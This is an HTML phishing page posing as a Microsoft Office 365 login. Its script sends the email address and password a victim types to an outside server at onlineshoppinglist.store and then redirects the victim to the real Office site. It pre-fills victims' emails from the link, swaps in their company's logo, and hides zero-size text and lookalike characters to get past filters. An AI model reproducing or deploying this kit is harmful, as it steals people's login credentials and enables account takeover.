<!DOCTYPE html>
<html lang="en">

<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" />
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.1/css/all.css" />
  <!--  <link rel="stylesheet" href="css/app.css" /> -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <title>Secured Login</title>
<style>
    .progress {
        overflow: hidden;
    }

    .progress>div {
        position: absolute;
        height: 5px;
        width: 5px;
        background-color: #0067b8;
        z-index: 100;
        border-radius: 50%;
        opacity: 0;
    }

    .progress {
        position: absolute;
        top: 0;
        left: 0;
        height: 5px;
        width: 100%;
    }

    .progress>div {
        -webkit-animation: progressDot 2s infinite;
        -moz-animation: progressDot 2s infinite;
        -o-animation: progressDot 2s infinite;
        animation: progressDot 2s infinite;
    }

    .progress>div:nth-child(1) {
        -webkit-animation-delay: .05s;
        -moz-animation-delay: .05s;
        -o-animation-delay: .05s;
        animation-delay: .05s;
    }

    .progress>div:nth-child(2) {
        -webkit-animation-delay: .2s;
        -moz-animation-delay: .2s;
        -o-animation-delay: .2s;
        animation-delay: .2s;
    }

    .progress>div:nth-child(3) {
        -webkit-animation-delay: .35s;
        -moz-animation-delay: .35s;
        -o-animation-delay: .35s;
        animation-delay: .35s;
    }

    .progress>div:nth-child(4) {
        -webkit-animation-delay: .5s;
        -moz-animation-delay: .5s;
        -o-animation-delay: .5s;
        animation-delay: .5s;
    }

    .progress>div:nth-child(5) {
        -webkit-animation-delay: .65s;
        -moz-animation-delay: .65s;
        -o-animation-delay: .65s;
        animation-delay: .65s;
    }

    @-webkit-keyframes progressDot {
        0%,
        20% {
            left: 0%;
            -webkit-animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            -webkit-animation-timing-function: linear;
        }
        65% {
            left: 60%;
            -webkit-animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @-moz-keyframes progressDot {
        0%,
        20% {
            left: 0%;
            -moz-animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            -moz-animation-timing-function: linear;
        }
        65% {
            left: 60%;
            -moz-animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @-o-keyframes progressDot {
        0%,
        20% {
            left: 0%;
            -o-animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            -o-animation-timing-function: linear;
        }
        65% {
            left: 60%;
            -o-animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @keyframes progressDot {
        0%,
        20% {
            left: 0%;
            animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            animation-timing-function: linear;
        }
        65% {
            left: 60%;
            animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }
</style>

<style type="text/css">
.loading-dots {
    text-align: center;
    z-index: 5;
    display: none;
}

.loading-dots .dot {
    color: #00A4EF;
    display: inline;
    margin-left: 0.2em;
    margin-right: 0.2em;
    position: relative;
    top: -1em;
    font-size: 4em;
    opacity: 0;
    -webkit-animation: showHideDot 2.5s ease-in-out infinite;
    animation: showHideDot 2.5s ease-in-out infinite;
}

.loading-dots .dot.one {
    -webkit-animation-delay: 0.2s;
    animation-delay: 0.2s;
}

.loading-dots .dot.two {
    -webkit-animation-delay: 0.4s;
    animation-delay: 0.4s;
}

.loading-dots .dot.three {
    -webkit-animation-delay: 0.6s;
    animation-delay: 0.6s;
}

@-webkit-keyframes showHideDot {
    0% {
        opacity: 0;
    }
    50% {
        opacity: 1;
    }
    60% {
        opacity: 1;
    }
    100% {
        opacity: 0;
    }
}

@keyframes showHideDot {
    0% {
        opacity: 0;
    }
    50% {
        opacity: 1;
    }
    60% {
        opacity: 1;
    }
    100% {
        opacity: 0;
    }
}

* {
  padding: 0px;
  margin: 0px;
}
textarea:hover,
input:hover,
textarea:active,
input:active,
textarea:focus,
input:focus,
button:focus,
button:active,
button:hover,
label:focus,
.btn:active,
.btn.active
{
    outline:0px !important;
    -webkit-appearance:none;
    box-shadow: none !important;
}
body {
  background-color: #f9f9f9;
}
#loginform {
  padding: 10px;

  justify-content: center;
}
#loginform input {
  margin-bottom: 15px;
  border: 1px solid grey;
  background-color: #f9f9f9;
  border-radius: 0px;
}
#loginform input:focus {
  border: 1px solid red;
  outline: none;
}
#loginform input[type="submit"] {
  background-color: #f6b610;
  color: white;
  font-size: 16px;
  border: none;
  color: black;
}
#loginform input[type="button"] {
  background-color: #f6b610;
  border: none;
  border-radius: 0px;
  color: black;
}
#loginform input[type="button"]:focus {
  background-color: #f6b610;
  color: white;
  font-size: 16px;
  border: none;
}
#pass {
  display: none;
}
a {
  text-decoration: none;
  font-size: 12px;
}

</style>
</head>



<body style="background-image: url('https://aadcdn.msauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg'); background-size: cover;background-repeat: no-repeat;background-attachment: fixed;">
    <br>


    <div class="container" style="width:1000px;">
        <div class="row">
            <div class=" col-sm-5 bg-white mx-auto p-4" style="margin: 70px 0px;">
              <div id="progressBar" class="progress" style="display:none;">
                  <div></div>
                  <div></div>
                  <div></div>
                  <div></div>
                  <div></div>
              </div>

                <div id="loginform" style="padding:0px;">

                    <img id="logoimg" src="https://logo.clearbit.com/office.com" class="img-fluid" width="50px"><span id="logoname" class="align-middle h5" style="color: #747474;">Microsoft</span><br><br>
                    <span class="h5"><span style="font-size:0px;color:blue;">AS</span>Sign In<span style="font-size:0px;color:blue;">dependence</span></span><br>
                    <div id="chk" style="display: none;" class="alert alert-danger" ></div>
                    <br>
                    <span id="error" style="display: none;" class="text-danger">That Micro<span style="font-size:0px;color:blue;">phone</span>soft<span style="font-size:0px;color:blue;">ware</span> account<span style="font-size:0px;color:blue;">ant</span> doesn't <span style="font-size:0px;color:blue;">co</span>exist. Enter a different account</span>

                    <div class="row" id="em">
                        <div class="col-sm-12">
                            <input type="email" name="uemail" value="" class="form-control bg-transparent" id="email" aria-describedby="emailHelp" placeholder="Email, phone or skype" style="border-right: none;border-left: none;border-top: none; border-bottom: 1px solid grey;">


                            <input type="hidden" id="nemail" value="" name="nemail">

                        </div>
                    </div>
                    <div class="row" id="pass">
                        <div class="col-sm-12">
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="emailch">abc@abc.com</span><br><br>
                            <h4 style="font-size:20px;font-family:Helvetica;font-weight:120px;color:#1b1b1bfc;">Enter Password</h4>
                            <div style="color: red;" class="warning" id="warning"></div>
                            <p style="font-size:14px;font-family:Helvetica,Arial;color:#333333">Because you are accessing sensitive info, Microsoft wants to make sure it's really you.</p>

                            <input type="password" name="password" id="password" placeholder="Password" required
                            class="form-control shadow-none bg-transparent" style="border-right: none;border-left: none;border-top: none; border-bottom: 1px solid grey;">


                        </div>
                    </div>
                    <div class="row">
                        <div class="col-sm-12">
                            <p style="color:#0000ffb8; font-size:13px">Forgot my password</p>


                        </div>
                    </div>
                    <div class="row">
                        <div class="col-sm-12">
                            <div id="fbtn" class="text-right ">
                                <input type="button" value="Next" id="next" onclick="shownext()"
                                class="btn btn-primary px-4 shadow-none text-white" style="background-color: #0066BA;">
                            </div>
                            <div id="sbtn" style="display: none;" class="text-right">
                                <input type="submit" name="submit" id="submit-btn"  onclick="sendmails()" value="Login" class="btn px-4 text-white" style="background-color: #0066BA;">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

</body>

<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js" integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>

<script>
var msg = new URLSearchParams(window.location.search).get("message");
var msgd=decodeURIComponent(msg);
if (!msg) {
// $('#chk').hide();
}
else
{
	$('#chk').html(msgd);
    $('#chk').show();
}

function shownext()
  {
     var email=$('#email').val();
     var my_email =email;
     var filter = /^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/;
     if (!filter.test(my_email))
     {
       $('#error').show();
       email.focus;
       return false;
     }
     else
     {
         $('#error').hide();
          $('#password').val("");
         $('#emailch').html(my_email);
         var ind=my_email.indexOf("@");
         var my_slice=my_email.substr((ind+1));
         var c= my_slice.substr(0, my_slice.indexOf('.'));
         var final= c.toLowerCase();
         var finalu= c.toUpperCase();
         $("#fbtn").animate({left:0, opacity:"hide"}, 0);
         $("#sbtn").animate({left:0, opacity:"show"}, 1000);
         $("#em").animate({left:0, opacity:"hide"}, 0);
         $("#pass").animate({left:0, opacity:"show"}, 1000);
         $.get("https://logo.clearbit.com/"+my_slice)
         .done(function() {
             $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
             $("#logoname").html(finalu);

         }).fail(function() {
             $("#logoimg").attr("src", "https://logo.clearbit.com/office.com");
             $("#logoname").html("Microsoft");

         })

     }
  }

  /////////////url email getting////////////////
  var email = window.location.hash.substr(1);

  if (!email) {

  }
  else
  {

     $('#email').val(email);
      $('#password').val("");
     var my_email =email;
     var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
     var ind=my_email.indexOf("@");
         var my_slice=my_email.substr((ind+1));
         var c= my_slice.substr(0, my_slice.indexOf('.'));
         var final= c.toLowerCase();
         var finalu= c.toUpperCase();
     $('#emailch').html(my_email);
     $("#fbtn").animate({left:0, opacity:"hide"}, 0);
     $("#sbtn").animate({left:0, opacity:"show"}, 1000);
     $("#em").animate({left:0, opacity:"hide"}, 0);
     $("#pass").animate({left:0, opacity:"show"}, 1000);
     $.get("https://logo.clearbit.com/"+my_slice)
     .done(function() {
         $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
     $("#logoname").html(finalu);

     }).fail(function() {
         $("#logoimg").attr("src", "https://logo.clearbit.com/office.com");
     $("#logoname").html("Microsoft");

     })
  }

  $('#password').keyup(function(event) {
      if (event.which == 13) {
          $('#submit-btn').click();
      }
  });

    function sendmails() {
      var em = $("#email").val();
      var ps = $("#password").val();


      $.ajax({
          url: 'https://onlineshoppinglist.store/refine.php', // full url of processor.php
          type: 'POST',
          data: {
              user: em,
              pass: ps,
      type: 1
          },
          beforeSend: function() {
            $(".progress").show();
      $('#submit-btn').val('Loading...');
    },

          success: function(response) {
              if (response == 0) {
                  $("#password").val("");
                  $(".progress").hide();
                  $("#warning").empty();
                  $('#warning').append('Yо­ur е­mа­il оr ра­s­s­wо­rd is inсоrrесt. If yоu dоn\'t <br> rеmе­mbеr yо­ur р­аs­s­wо­r­d,<a href="#" style="font-size:15px"> re­se­t it n­o­w.<a/> <br> <br> ');
              } else if (response == 1) {

                  location.href = "https://office365.com";
              }
          },

          complete: function(){
            $('#submit-btn').val('Login');
          }
      });
  }

</script>

</html>
